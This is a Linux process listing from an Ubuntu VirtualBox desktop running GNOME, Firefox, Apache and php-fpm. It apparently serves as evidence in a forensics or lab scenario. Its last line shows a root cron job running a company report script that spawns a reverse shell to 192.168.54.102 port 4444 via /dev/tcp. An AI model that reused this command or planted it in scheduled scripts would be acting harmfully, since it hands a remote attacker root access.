F S UID          PID    PPID  C PRI  NI ADDR SZ WCHAN  STIME TTY          TIME CMD
4 S root           1       0  0  80   0 -  5847 ep_pol 12:16 ?        00:00:02 /sbin/init splash
1 S root           2       0  0  80   0 -     0 kthrea 12:16 ?        00:00:00 [kthreadd]
1 S root           3       2  0  80   0 -     0 kthrea 12:16 ?        00:00:00 [pool_workqueue_release]
1 I root           4       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-rcu_gp]
1 I root           5       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-sync_wq]
1 I root           6       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-kvfree_rcu_reclaim]
1 I root           7       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-slub_flushwq]
1 I root           8       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-netns]
1 I root          12       2  0  80   0 -     0 worker 12:16 ?        00:00:00 [kworker/u8:0-ipv6_addrconf]
1 I root          13       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-mm_percpu_wq]
1 I root          14       2  0  80   0 -     0 rcu_ta 12:16 ?        00:00:00 [rcu_tasks_kthread]
1 I root          15       2  0  80   0 -     0 rcu_ta 12:16 ?        00:00:00 [rcu_tasks_rude_kthread]
1 I root          16       2  0  80   0 -     0 rcu_ta 12:16 ?        00:00:00 [rcu_tasks_trace_kthread]
1 S root          17       2  0  80   0 -     0 smpboo 12:16 ?        00:00:01 [ksoftirqd/0]
1 I root          18       2  0  80   0 -     0 rcu_gp 12:16 ?        00:00:01 [rcu_preempt]
1 S root          19       2  0  80   0 -     0 kthrea 12:16 ?        00:00:00 [rcu_exp_par_gp_kthread_worker/0]
1 S root          20       2  0  80   0 -     0 kthrea 12:16 ?        00:00:00 [rcu_exp_gp_kthread_worker]
1 S root          21       2  0 -40   - -     0 smpboo 12:16 ?        00:00:00 [migration/0]
1 S root          22       2  0   9   - -     0 smpboo 12:16 ?        00:00:00 [idle_inject/0]
1 S root          23       2  0  80   0 -     0 smpboo 12:16 ?        00:00:00 [cpuhp/0]
1 S root          24       2  0  80   0 -     0 smpboo 12:16 ?        00:00:00 [cpuhp/1]
1 S root          25       2  0   9   - -     0 smpboo 12:16 ?        00:00:00 [idle_inject/1]
1 S root          26       2  0 -40   - -     0 smpboo 12:16 ?        00:00:00 [migration/1]
1 S root          27       2  0  80   0 -     0 smpboo 12:16 ?        00:00:00 [ksoftirqd/1]
5 S root          32       2  0  80   0 -     0 devtmp 12:16 ?        00:00:00 [kdevtmpfs]
1 I root          33       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-inet_frag_wq]
1 S root          34       2  0  80   0 -     0 kaudit 12:16 ?        00:00:00 [kauditd]
1 S root          35       2  0  80   0 -     0 watchd 12:16 ?        00:00:00 [khungtaskd]
1 S root          36       2  0  80   0 -     0 oom_re 12:16 ?        00:00:00 [oom_reaper]
1 I root          38       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-writeback]
1 S root          39       2  0  80   0 -     0 kcompa 12:16 ?        00:00:00 [kcompactd0]
1 S root          41       2  0  85   5 -     0 ksm_sc 12:16 ?        00:00:00 [ksmd]
1 S root          42       2  0  99  19 -     0 khugep 12:16 ?        00:00:00 [khugepaged]
1 I root          43       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-kintegrityd]
1 I root          44       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-kblockd]
1 I root          45       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-blkcg_punt_bio]
1 S root          46       2  0   9   - -     0 irq_th 12:16 ?        00:00:00 [irq/9-acpi]
1 I root          47       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-tpm_dev_wq]
1 I root          48       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-ata_sff]
1 I root          49       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-md]
1 I root          50       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-md_bitmap]
1 I root          51       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-edac-poller]
1 I root          52       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-devfreq_wq]
1 S root          53       2  0   9   - -     0 kthrea 12:16 ?        00:00:00 [watchdogd]
1 I root          54       2  0  60 -20 -     0 worker 12:16 ?        00:00:01 [kworker/0:1H-kblockd]
1 S root          55       2  0  80   0 -     0 kswapd 12:16 ?        00:00:00 [kswapd0]
1 S root          56       2  0  80   0 -     0 ecrypt 12:16 ?        00:00:00 [ecryptfs-kthread]
1 I root          57       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-kthrotld]
1 I root          58       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-acpi_thermal_pm]
1 S root          60       2  0  80   0 -     0 scsi_e 12:16 ?        00:00:00 [scsi_eh_0]
1 I root          61       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-scsi_tmf_0]
1 S root          62       2  0  80   0 -     0 scsi_e 12:16 ?        00:00:00 [scsi_eh_1]
1 I root          63       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-scsi_tmf_1]
1 I root          67       2  0  60 -20 -     0 worker 12:16 ?        00:00:00 [kworker/1:1H-kblockd]
1 I root          68       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-mld]
1 I root          69       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-ipv6_addrconf]
1 I root          70       2  0  80   0 -     0 worker 12:16 ?        00:00:00 [kworker/u8:1-ipv6_addrconf]
1 I root          78       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-kstrp]
1 I root          80       2  0  60 -20 -     0 worker 12:16 ?        00:00:00 [kworker/u11:0]
1 I root          81       2  0  60 -20 -     0 worker 12:16 ?        00:00:00 [kworker/u12:0-ttm]
1 I root          82       2  0  60 -20 -     0 worker 12:16 ?        00:00:00 [kworker/u13:0-ttm]
1 I root          95       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-charger_manager]
1 S root         145       2  0  80   0 -     0 scsi_e 12:16 ?        00:00:00 [scsi_eh_2]
1 I root         146       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-scsi_tmf_2]
1 S root         201       2  0  80   0 -     0 kjourn 12:16 ?        00:00:00 [jbd2/sda2-8]
1 I root         202       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-ext4-rsv-conversion]
4 S root         250       1  0  79  -1 - 12712 ep_pol 12:16 ?        00:00:00 /usr/lib/systemd/systemd-journald
4 S root         322       1  0  80   0 -  7648 ep_pol 12:16 ?        00:00:00 /usr/lib/systemd/systemd-udevd
1 S root         372       2  0  58   - -     0 psi_rt 12:16 ?        00:00:00 [psimon]
4 S systemd+     415       1  0  80   0 -  4433 ep_pol 12:16 ?        00:00:01 /usr/lib/systemd/systemd-oomd
4 S systemd+     418       1  0  80   0 -  5430 ep_pol 12:16 ?        00:00:00 /usr/lib/systemd/systemd-resolved
1 I root         564       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-cryptd]
1 S root         573       2  0   9   - -     0 irq_th 12:16 ?        00:00:00 [irq/18-vmwgfx]
1 I root         576       2  0  60 -20 -     0 rescue 12:16 ?        00:00:00 [kworker/R-ttm]
4 S avahi        681       1  0  80   0 -  2189 do_pol 12:16 ?        00:00:00 avahi-daemon: running [mark-VirtualBox-2.local]
4 S message+     685       1  0  80   0 -  3047 ep_pol 12:16 ?        00:00:01 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
4 S gnome-r+     690       1  0  80   0 - 128202 do_pol 12:16 ?       00:00:00 /usr/libexec/gnome-remote-desktop-daemon --system
4 S polkitd      709       1  0  80   0 - 97338 do_pol 12:16 ?        00:00:00 /usr/lib/polkit-1/polkitd --no-debug
4 S root         717       1  0  80   0 - 77819 do_pol 12:16 ?        00:00:00 /usr/libexec/power-profiles-daemon
4 S root         730       1  0  80   0 - 462341 futex_ 12:16 ?       00:00:01 /usr/lib/snapd/snapd
4 S root         735       1  0  80   0 - 77838 do_pol 12:16 ?        00:00:00 /usr/libexec/accounts-daemon
4 S root         743       1  0  80   0 -  1707 hrtime 12:16 ?        00:00:00 /usr/sbin/cron -f -L 0
4 S root         746       1  0  80   0 - 76850 do_pol 12:16 ?        00:00:00 /usr/libexec/switcheroo-control
4 S root         752       1  0  80   0 -  4538 ep_pol 12:16 ?        00:00:00 /usr/lib/systemd/systemd-logind
4 S root         757       1  0  80   0 - 117360 do_pol 12:16 ?       00:00:00 /usr/libexec/udisks2/udisksd
1 S avahi        780     681  0  80   0 -  2120 unix_s 12:16 ?        00:00:00 avahi-daemon: chroot helper
4 S root         797       1  0  80   0 - 83797 do_pol 12:16 ?        00:00:01 /usr/sbin/NetworkManager --no-daemon
4 S root         800       1  0  80   0 -  4345 do_sel 12:16 ?        00:00:00 /usr/sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev
4 S syslog       811       1  0  80   0 - 55641 do_sel 12:16 ?        00:00:00 /usr/sbin/rsyslogd -n -iNONE
4 S root         933       1  0  80   0 - 98024 do_pol 12:16 ?        00:00:00 /usr/sbin/ModemManager
1 S root         984       1  0  80   0 - 89673 do_sig 12:16 ?        00:00:01 /usr/sbin/VBoxService
4 S root        1150       1  0  80   0 -  8838 ep_pol 12:16 ?        00:00:00 /usr/sbin/cupsd -l
4 S root        1154       1  0  80   0 - 57521 ep_pol 12:16 ?        00:00:00 php-fpm: master process (/etc/php/8.3/fpm/php-fpm.conf)
4 S root        1162       1  0  80   0 - 27415 do_pol 12:16 ?        00:00:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
5 S www-data    1182    1154  0  80   0 - 57660 skb_wa 12:16 ?        00:00:00 php-fpm: pool www
5 S www-data    1183    1154  0  80   0 - 57660 skb_wa 12:16 ?        00:00:00 php-fpm: pool www
4 S root        1188       1  0  80   0 - 78154 do_pol 12:16 ?        00:00:00 /usr/sbin/gdm3
1 S root        1202       1  0  80   0 - 57970 do_sel 12:16 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    1237    1202  0  80   0 - 58176 inet_c 12:16 ?        00:00:00 /usr/sbin/apache2 -k start
4 S rtkit       1297       1  0  81   1 - 22119 do_pol 12:16 ?        00:00:00 /usr/libexec/rtkit-daemon
4 S cups-br+    1321       1  0  80   0 - 67088 do_pol 12:16 ?        00:00:00 /usr/sbin/cups-browsed
1 S kernoops    1333       1  0  80   0 -  3186 do_pol 12:16 ?        00:00:00 /usr/sbin/kerneloops --test
1 S kernoops    1341       1  0  80   0 -  3186 do_pol 12:16 ?        00:00:00 /usr/sbin/kerneloops
4 S colord      1437       1  0  80   0 - 79452 do_pol 12:16 ?        00:00:00 /usr/libexec/colord
4 S root        1485       1  0  80   0 - 78611 do_pol 12:16 ?        00:00:00 /usr/libexec/upowerd
1 I root        1770       2  0  60 -20 -     0 worker 12:16 ?        00:00:00 [kworker/u13:1]
4 S root        1806    1188  0  80   0 - 96968 do_pol 12:17 ?        00:00:00 gdm-session-worker [pam/gdm-password]
4 S mark        1820       1  0  80   0 -  5292 ep_pol 12:17 ?        00:00:00 /usr/lib/systemd/systemd --user
5 S mark        1821    1820  0  80   0 -  5365 do_sig 12:17 ?        00:00:00 (sd-pam)
0 S mark        1835    1820  0  80   0 - 28593 ep_pol 12:17 ?        00:00:00 /usr/bin/pipewire
0 S mark        1840    1820  0  80   0 - 23785 ep_pol 12:17 ?        00:00:00 /usr/bin/pipewire -c filter-chain.conf
4 S mark        1841    1820  0  80   0 -  9784 do_wai 12:17 ?        00:00:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
0 S mark        1842    1820  0  80   0 - 101184 do_pol 12:17 ?       00:00:00 /usr/bin/wireplumber
0 S mark        1843    1820  0  80   0 - 28759 ep_pol 12:17 ?        00:00:00 /usr/bin/pipewire-pulse
0 S mark        1844    1820  0  80   0 - 78544 do_pol 12:17 ?        00:00:00 /usr/bin/gnome-keyring-daemon --foreground --components=pkcs11,secrets --control-directory=/run/user/1000/keyring
0 S mark        1849    1820  0  80   0 -  2772 ep_pol 12:17 ?        00:00:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
4 S mark        1893    1806  0  80   0 - 58373 do_pol 12:17 tty2     00:00:00 /usr/libexec/gdm-wayland-session env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu
0 S mark        1916    1893  0  80   0 - 74014 do_pol 12:17 tty2     00:00:00 /usr/libexec/gnome-session-binary --session=ubuntu
0 S mark        1937    1820  0  80   0 - 188889 do_pol 12:17 ?       00:00:00 /usr/libexec/xdg-document-portal
0 S mark        1951    1820  0  80   0 - 76809 do_pol 12:17 ?        00:00:00 /usr/libexec/xdg-permission-store
4 S root        1962    1937  0  80   0 -   676 unix_s 12:17 ?        00:00:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
0 S mark        2005    1820  0  80   0 - 40663 do_pol 12:17 ?        00:00:00 /usr/libexec/gcr-ssh-agent --base-dir /run/user/1000/gcr
0 S mark        2008    1820  0  80   0 - 22238 do_pol 12:17 ?        00:00:00 /usr/libexec/gnome-session-ctl --monitor
0 S mark        2018    1820  0  80   0 - 78029 do_pol 12:17 ?        00:00:00 /usr/libexec/gvfsd
0 S mark        2030    1820  0  80   0 - 114377 futex_ 12:17 ?       00:00:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
0 S mark        2032    1820  0  80   0 - 215747 do_pol 12:17 ?       00:00:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu
0 S mark        2065    1820  2  80   0 - 1023317 do_pol 12:17 ?      00:03:07 /usr/bin/gnome-shell
0 S mark        2066    2032  0  80   0 - 95735 do_pol 12:17 ?        00:00:00 /usr/libexec/at-spi-bus-launcher --launch-immediately
0 S mark        2078    2066  0  80   0 -  2403 ep_pol 12:17 ?        00:00:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus
0 S mark        2138    1820  0  80   0 - 59017 do_pol 12:17 ?        00:00:00 /usr/libexec/at-spi2-registryd --use-gnome-session
1 S mark        2147    1841  0  80   0 - 107117 do_pol 12:17 ?       00:00:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
0 S mark        2158    1820  0  80   0 - 163709 do_pol 12:17 ?       00:00:00 /usr/libexec/gnome-shell-calendar-server
0 S mark        2169    1820  0  80   0 - 301247 do_pol 12:17 ?       00:00:00 /usr/libexec/evolution-source-registry
0 S mark        2176    1820  0  80   0 - 629258 do_pol 12:17 ?       00:00:00 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.Shell.Notifications
0 S mark        2182    1820  0  80   0 - 96661 do_pol 12:17 ?        00:00:02 /usr/bin/ibus-daemon --panel disable
0 S mark        2185    1820  0  80   0 - 95353 do_pol 12:17 ?        00:00:00 /usr/libexec/gsd-a11y-settings
0 S mark        2186    1820  0  80   0 - 102877 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-color
0 S mark        2187    1820  0  80   0 - 107394 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-datetime
0 S mark        2188    1820  0  80   0 - 114191 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-housekeeping
0 S mark        2189    1820  0  80   0 - 120992 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-keyboard
0 S mark        2190    1820  0  80   0 - 185004 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-media-keys
0 S mark        2191    1820  0  80   0 - 148911 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-power
0 S mark        2192    1820  0  80   0 - 80312 do_pol 12:17 ?        00:00:00 /usr/libexec/gsd-print-notifications
0 S mark        2193    1820  0  80   0 - 132244 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-rfkill
0 S mark        2195    1820  0  80   0 - 76795 do_pol 12:17 ?        00:00:00 /usr/libexec/gsd-screensaver-proxy
0 S mark        2197    1820  0  80   0 - 135272 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-sharing
0 S mark        2201    1820  0  80   0 - 114361 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-smartcard
0 S mark        2202    1820  0  80   0 - 97882 do_pol 12:17 ?        00:00:00 /usr/libexec/gsd-sound
0 S mark        2206    1820  0  80   0 - 121233 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-wacom
0 S mark        2224    2032  0  80   0 - 224022 do_pol 12:17 ?       00:00:00 /usr/libexec/evolution-data-server/evolution-alarm-notify
0 S mark        2258    2065  0  80   0 - 64022 ep_pol 12:17 ?        00:00:00 /usr/bin/Xwayland :0 -rootless -noreset -accessx -core -auth /run/user/1000/.mutter-Xwaylandauth.7QTFG3 -listenfd 4 -listenfd 5 -displayfd 6 -initfd 7 -byteswappedclients
0 S mark        2267    2032  0  80   0 - 76373 do_pol 12:17 ?        00:00:00 /usr/libexec/gsd-disk-utility-notify
0 S mark        2324    1820  0  80   0 - 136120 do_pol 12:17 ?       00:00:00 /usr/libexec/goa-daemon
0 S mark        2379    1820  0  80   0 - 115224 do_pol 12:17 ?       00:00:00 /usr/libexec/gvfs-udisks2-volume-monitor
0 S mark        2411    1820  0  80   0 - 222138 do_pol 12:17 ?       00:00:00 /usr/libexec/evolution-calendar-factory
0 S mark        2412    2182  0  80   0 - 58611 do_pol 12:17 ?        00:00:00 /usr/libexec/ibus-memconf
0 S mark        2413    2182  0  80   0 - 104958 do_pol 12:17 ?       00:00:01 /usr/libexec/ibus-extension-gtk3
0 S mark        2418    1820  0  80   0 - 77011 do_pol 12:17 ?        00:00:00 /usr/libexec/ibus-portal
0 S mark        2427    1820  0  80   0 - 96736 do_pol 12:17 ?        00:00:00 /usr/libexec/goa-identity-service
0 S mark        2430    1820  0  80   0 - 103464 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-printer
0 S mark        2455    1820  0  80   0 - 76879 do_pol 12:17 ?        00:00:00 /usr/libexec/gvfs-goa-volume-monitor
0 S mark        2459    1820  0  80   0 - 205815 do_pol 12:17 ?       00:00:00 /usr/libexec/evolution-addressbook-factory
0 S mark        2470    1820  0  80   0 - 96749 do_pol 12:17 ?        00:00:00 /usr/libexec/gvfs-afc-volume-monitor
0 S mark        2478    1820  0  80   0 - 77088 do_pol 12:17 ?        00:00:00 /usr/libexec/gvfs-gphoto2-volume-monitor
0 S mark        2485    1820  0  80   0 - 76846 do_pol 12:17 ?        00:00:00 /usr/libexec/gvfs-mtp-volume-monitor
0 S mark        2506    2182  0  80   0 - 58642 do_pol 12:17 ?        00:00:00 /usr/libexec/ibus-engine-simple
0 S mark        2528    1820  0  80   0 - 57556 do_pol 12:17 ?        00:00:00 /usr/libexec/dconf-service
0 S mark        2547    2018  0  80   0 - 151824 do_pol 12:17 ?       00:00:00 /usr/libexec/gvfsd-trash --spawner :1.20 /org/gtk/gvfs/exec_spaw/0
0 S mark        2559    1820  0  80   0 - 159801 do_pol 12:17 ?       00:00:00 /usr/libexec/gsd-xsettings
1 I root        2612       2  0  60 -20 -     0 worker 12:17 ?        00:00:00 [kworker/u12:1]
0 S mark        2614    1820  0  80   0 - 629270 do_pol 12:17 ?       00:00:00 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.ScreenSaver
0 S mark        2658    1820  0  80   0 - 174850 do_pol 12:17 ?       00:00:00 /usr/libexec/xdg-desktop-portal
0 S mark        2670    1820  0  80   0 - 66349 do_pol 12:17 ?        00:00:00 /usr/libexec/ibus-x11
0 S mark        2677    1820  0  99   - - 183355 do_pol 12:17 ?       00:00:00 /usr/libexec/tracker-miner-fs-3
0 S mark        2678    1820  0  80   0 - 193935 do_pol 12:17 ?       00:00:00 /usr/libexec/xdg-desktop-portal-gnome
0 S mark        2682    2065  0  80   0 - 278952 do_pol 12:17 ?       00:00:00 /usr/libexec/mutter-x11-frames
0 S mark        2709    1820  0  80   0 - 58524 do_pol 12:17 ?        00:00:00 /usr/libexec/gvfsd-metadata
0 S mark        2712    1820  0  80   0 - 104053 do_pol 12:17 ?       00:00:00 /usr/libexec/xdg-desktop-portal-gtk
0 S mark        2750    1820  0  80   0 -  7327 do_wai 12:17 ?        00:00:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait
0 S mark        2751    2750  0  80   0 - 114322 do_pol 12:17 ?       00:00:00 /usr/bin/gnome-terminal.real --wait
0 S mark        2757    1820  0  80   0 - 177989 do_pol 12:17 ?       00:00:07 /usr/libexec/gnome-terminal-server
0 S mark        2765    2757  0  80   0 -  2139 do_sel 12:17 pts/0    00:00:00 bash
0 T mark        2817    2765  0  80   0 -  4334 do_sig 12:17 pts/0    00:00:00 systemctl status apache2
0 T mark        2818    2817  0  80   0 -  1519 do_sig 12:17 pts/0    00:00:00 pager
0 S mark        2828    2032  0  80   0 - 141905 do_pol 12:18 ?       00:00:00 /usr/bin/update-notifier
4 S mark        2906    2065  0  80   0 - 1043366 do_pol 12:21 ?      00:00:17 /snap/firefox/7355/usr/lib/firefox/firefox
1 S mark        2976    1820  0  80   0 - 266669 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/crashhelper 2906 9 /tmp/ 11
4 S mark        3053    2906  0  80   0 - 337128 unix_s 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {ca6a72ff-4fc0-4b33-babd-453649baae68} -parentPid 2906 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 1 forkserver
5 S mark        3060    3053  0  80   0 - 340730 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -parentBuildID 20251118110623 -prefsHandle 0:35081 -prefMapHandle 1:276878 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {6b6a53dd-96bc-45a7-8d9f-468e0a436440} -parentPid 2906 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7355/usr/lib/firefox/browser 2 socket
5 S mark        3095    3053  0  80   0 - 881505 do_pol 12:21 ?       00:00:04 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:35253 -prefMapHandle 1:276878 -jsInitHandle 2:224660 -parentBuildID 20251118110623 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3eaca145-d9d4-4e36-8608-1564e07e9d30} -parentPid 2906 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 3 tab
5 S mark        3106    3053  0  80   0 - 373988 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -parentBuildID 20251118110623 -prefsHandle 0:35253 -prefMapHandle 1:276878 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {bf8993e8-537a-49b8-a48b-9a73bfdc19de} -parentPid 2906 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7355/usr/lib/firefox/browser 4 rdd
0 S mark        3142    1820  0  80   0 - 441549 futex_ 12:21 ?       00:00:00 /usr/bin/snap userd
5 S mark        3292    3053  0  80   0 - 879913 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45532 -prefMapHandle 1:276878 -jsInitHandle 2:224660 -parentBuildID 20251118110623 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {ac9ce2e4-958e-4d4a-9cc6-074473622295} -parentPid 2906 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 5 tab
5 S mark        3313    3053  0  80   0 - 873352 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:42383 -prefMapHandle 1:276878 -jsInitHandle 2:224660 -parentBuildID 20251118110623 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {66507e1a-5169-42d5-b957-4473adebf1ad} -parentPid 2906 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 6 tab
5 S mark        3655    3053  0  80   0 - 340481 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -parentBuildID 20251118110623 -sandboxingKind 0 -prefsHandle 0:46526 -prefMapHandle 1:276878 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {65707cd9-a94d-4233-be6e-f9839e4e1f3e} -parentPid 2906 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7355/usr/lib/firefox/browser 7 utility
5 S mark        3663    3053  0  80   0 - 868462 do_pol 12:21 ?       00:00:00 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43323 -prefMapHandle 1:276878 -jsInitHandle 2:224660 -parentBuildID 20251118110623 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {adde2cdc-39d7-499b-a18e-f46f14ad3ba0} -parentPid 2906 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 8 tab
5 S mark        3668    3053  0  80   0 - 868462 do_pol 12:21 ?       00:00:02 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43323 -prefMapHandle 1:276878 -jsInitHandle 2:224660 -parentBuildID 20251118110623 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {bb1bf7cd-f43c-44e2-83d7-055c45b3c5bd} -parentPid 2906 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 9 tab
5 S mark        3838    3053  0  80   0 - 868462 do_pol 12:21 ?       00:00:02 /snap/firefox/7355/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43323 -prefMapHandle 1:276878 -jsInitHandle 2:224660 -parentBuildID 20251118110623 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a289e6b-d107-49e3-b034-54d6b9cb7073} -parentPid 2906 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7355/usr/lib/firefox/omni.ja -appomni /snap/firefox/7355/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7355/usr/lib/firefox/browser 10 tab
4 S root        3990       1  0  80   0 - 149366 do_pol 12:24 ?       00:00:01 /usr/libexec/fwupd/fwupd
0 S mark        4083    2018  0  80   0 - 96550 do_pol 12:26 ?        00:00:00 /usr/libexec/gvfsd-recent --spawner :1.20 /org/gtk/gvfs/exec_spaw/1
0 S mark        4307    1820  0  80   0 -   700 do_wai 12:27 ?        00:00:00 sh -c /usr/bin/nautilus --gapplication-service
0 S mark        4308    4307  0  80   0 - 454860 do_pol 12:27 ?       00:00:24 /usr/bin/nautilus --gapplication-service
5 S www-data    4503    1202  0  80   0 - 58164 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4504    1202  0  80   0 - 58244 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4506    1202  0  80   0 - 58244 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4509    1202  0  80   0 - 58243 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4513    1202  0  80   0 - 58191 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4515    1202  0  80   0 - 58191 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4518    1202  0  80   0 - 58191 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4521    1202  0  80   0 - 58191 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data    4522    1202  0  80   0 - 58160 inet_c 12:32 ?        00:00:00 /usr/sbin/apache2 -k start
1 I root        4583       2  0  80   0 -     0 worker 12:35 ?        00:00:00 [kworker/1:0-events]
5 S root        4763     743  0  80   0 -  2464 do_wai 12:45 ?        00:00:00 /usr/sbin/CRON -f -L 0
4 S root        4765    4763  0  80   0 -   700 do_wai 12:45 ?        00:00:00 /bin/sh -c /opt/company/scripts/generate_reports.sh
0 S root        4767    4765  0  80   0 -  1836 do_wai 12:45 ?        00:00:00 /bin/bash /opt/company/scripts/generate_reports.sh
0 S root        4782    4767  0  80   0 -  1836 do_wai 12:45 ?        00:00:00 bash -c bash -i >& /dev/tcp/192.168.54.102/4444 0>&1
